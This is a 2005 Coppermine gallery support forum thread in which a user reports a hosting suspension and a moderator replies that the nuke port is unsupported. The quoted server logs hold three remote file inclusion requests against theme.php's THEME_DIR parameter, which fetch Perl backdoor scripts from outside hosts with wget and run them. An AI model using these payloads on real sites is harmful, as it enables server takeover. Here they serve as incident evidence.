getting hacked getting hacked
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

getting hacked

Started by mrmike987, July 07, 2005, 12:46:29 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

mrmike987

gogclan.com on Server 102 was suspended for
Website Exploit - Coppermine is being exploited, and has been over the past couple of weeks.

Location of Documentation Logs:
Yes, see notes below

Comments added in WHM:
Yes.


Was Client Notified:
Yes, through this suspension.

Any additional notes:
gogclan.com:200.164.108.163 - - [30/Jun/2005:16:40:47 -0400] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://newton.100free.com/newcmd.gif?&cmd=cd%20/tmp;wget%20www.bo0mber.oi.com.br/bd.pl HTTP/1.0" 200 12891 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

gogclan.com:200.210.219.171 - - [02/Jul/2005:03:12:49 -0400] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://psc.yoll.net/cmd?&cmd=cd%20/var/tmp;%20GET%20http://geocities.yahoo.com.br/wdteam/beto.txt%20>%20beto.txt;%20chmod%20777%20beto.txtl;%20perl%20beto.txt HTTP/1.0" 200 14798 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.40607)"

gogclan.com:200.165.181.247 - - [06/Jul/2005:15:08:28 -0400] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://mi.verizon.net.do/carlos18/tool25.dot?&cmd=cd%20/tmp;wget%20www.bo0mber.oi.com.br/bd.pl HTTP/1.1" 200 12936 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

kegobeer

There is no support for the nuke port of Coppermine.  If you want Coppermine with nuke, you have to use CPG-Nuke.  A google search for coppermine nuke exploit turned up a link to cpgnuke anyway:

http://www.cpgnuke.com/Forums/viewtopic/t=3580.html

The standalone version has no known security holes.  Switch to CPG-Nuke if you want to continue using Coppermine with nuke.
Do not send me a private message unless I ask for one.  Make your post public so everyone can benefit.

There are no stupid questions
But there are a LOT of inquisitive idiots

Joachim Müller